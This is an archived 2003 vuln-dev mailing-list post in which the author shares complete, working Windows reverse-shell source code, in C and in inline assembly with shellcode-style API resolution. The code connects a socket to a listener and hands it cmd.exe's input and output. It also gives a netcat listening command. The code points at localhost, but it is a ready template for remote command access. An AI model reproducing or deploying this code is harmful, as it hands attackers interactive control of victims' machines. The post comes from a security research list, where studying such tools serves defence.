Windows reverse Shell #2
From: NetNinja (netninja@hotmail.kg)
Date: 02/07/03
- Previous message: Knud Erik Højgaard: "Fw: f-prot antivirus useless buffer overflow"
- Next in thread: s7726: "RE: Windows reverse Shell #2"
- Reply: s7726: "RE: Windows reverse Shell #2"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Fri, 7 Feb 2003 18:44:53 +0600 From: NetNinja <netninja@hotmail.kg> To: vuln-dev@securityfocus.com
Hello folks,
Thnx everyone for ur replies.
Today i found time to have a careful look at my reverse shell C source
code. THe problem that i had was very simple. In my C source i forgot to
initilize STARTUPINFO struct to zero. That was the problem. 3APA3A's
code did initilize that struct, so big thnx to him. Another thing
u have to do is to cast socket handle returned from WSASocket call to
ptr type and pass it on to stdInput,stdOutput and stdErr of
STARTUPINFO struct.
That's it!
If anyone is interested in reverse cmd shell for windows i have
included both C and inline asm version. so have a look at them.
---- C ---------------
/*
reverse cmd shell
Will spit back command shell on ur listening netcat
on ur localhost (127.0.0.2) port 55
set up ur netcat eg. nc -l -p 55 -vv
A*** (netninja@hotmail.kg)
http://netninja.to.kg
*/
#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib,"ws2_32")
void main(int argc, char *argv[])
{
WSADATA wsaData;
SOCKET hSocket;
STARTUPINFO si;
PROCESS_INFORMATION pi;
struct sockaddr_in adik_sin;
memset(&adik_sin,0,sizeof(adik_sin));
memset(&si,0,sizeof(si));
WSAStartup(MAKEWORD(2,0),&wsaData);
hSocket = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL);
adik_sin.sin_family = AF_INET;
adik_sin.sin_port = htons(55);
adik_sin.sin_addr.s_addr = inet_addr("127.0.0.1");
connect(hSocket,(struct sockaddr*)&adik_sin,sizeof(adik_sin));
si.cb = sizeof(si);
si.dwFlags = STARTF_USESTDHANDLES;
si.hStdInput = si.hStdOutput = si.hStdError = (void *)hSocket;
CreateProcess(NULL,"cmd",NULL,NULL,true,NULL,NULL,NULL,&si,&pi);
ExitProcess(0);
}
------[ end C ]--------------
----[ inline ASM ]------
/*
reverse cmd shell
inline asm version
reverse cmd shell on address 127.0.0.1 port 55
A*** (netninja@hotmail.kg)
http://netninja.to.kg
*/
#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib,"ws2_32")
#define GP 0x77E7B332
#define LL 0x77E7D961
#define CreateProcessA [ebp-8]
#define ExitProcess [ebp-0ch]
#define WSASocketA [ebp-10h]
#define connect [ebp-14h]
#define CMD_STR [ebp-18h]
#define PORT 0x3700 //(htons(55)) here u gotta reverse byte order 0x0037=3700
#define IPADDR 0x0100007F // 7F000001//(inet_addr("127.0.0.1"))
void main(int argc, char *argv[])
{
char ptr[] = "kernel32\0CreateProcessA\0ExitProcess\0\0"
"ws2_32\0WSASocketA\0connect\0\0\0cmd\0\0\0";
char *i=ptr;
WSADATA wsaData;
WSAStartup(MAKEWORD(2,0),&wsaData); //initialize winsock, this is not done below
// usually when u inject ur shellcode into remote process
// socket is already initialized
__asm
{
mov edi, i
dec edi
push ebp
mov ebp,esp
sub esp,0x20
mov ecx,ebp
sub ecx,4h
push ecx
load_lib:
inc edi
cmp byte ptr[edi],0
je done_loadin
push edi
mov eax, LL
call eax //LoadLibrary("Lib")
mov [ebp-4],eax //places lib handle into ebp-4
xor eax,eax
repne scasb
load_func:
cmp byte ptr[edi],0
je load_lib
push edi
mov ebx, dword ptr[ebp-4] //lib handle
push ebx
mov eax, GP
call eax //GetProcAddress("Function")
pop ecx
sub ecx,4
mov dword ptr[ecx], eax
push ecx
xor eax,eax
repne scasb
jmp load_func
done_loadin:
xor eax,eax
inc edi
mov dword ptr[ebp-18h],edi
mov ecx,50 //make some space for structs
push_em:
push eax
loop push_em
push 0x1
push 0x2
call WSASocketA
mov ebx, eax //copies sockethandle returned into ebx
//ebp-20h
mov dword ptr[ebp-40h],0x2 //sockaddr_in
mov word ptr[ebp-3Eh],PORT
mov dword ptr[ebp-3Ch],IPADDR
//mov dword ptr[ebp-40h],process_information
mov dword ptr[ebp-94h],0x44 //sizeof startupinfo
mov dword ptr[ebp-68h],0x100 //dwFlags
mov dword ptr[ebp-5Ch],ebx //stdio
mov dword ptr[ebp-58h],ebx //stdout
mov dword ptr[ebp-54h],ebx //stderr
push 0x10 //sizeof sockaddr_in
lea edx, dword ptr[ebp-40h]
push edx //ptr to sockaddr_in
push ebx //socket handle
call connect
lea edx,dword ptr[ebp-50h]
push edx //push proc_info
lea edx,dword ptr[ebp-94h]
push edx //push ptr to startupinfo
xor edx,edx
push edx
push edx
push edx
inc edx //inheritHandles = true
push edx
dec edx
push edx
push edx
mov eax,CMD_STR //ptr to "cmd" str
push eax
push edx
call CreateProcessA
push edx
call ExitProcess
}
}
----[ end ]------
-- Best regards, A*** (NetNinja) mailto:netninja@hotmail.kg
- Next message: Andrei Mikhailovsky: "OpenSSH segfault (Debian distro)"
- Previous message: Knud Erik Højgaard: "Fw: f-prot antivirus useless buffer overflow"
- Next in thread: s7726: "RE: Windows reverse Shell #2"
- Reply: s7726: "RE: Windows reverse Shell #2"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
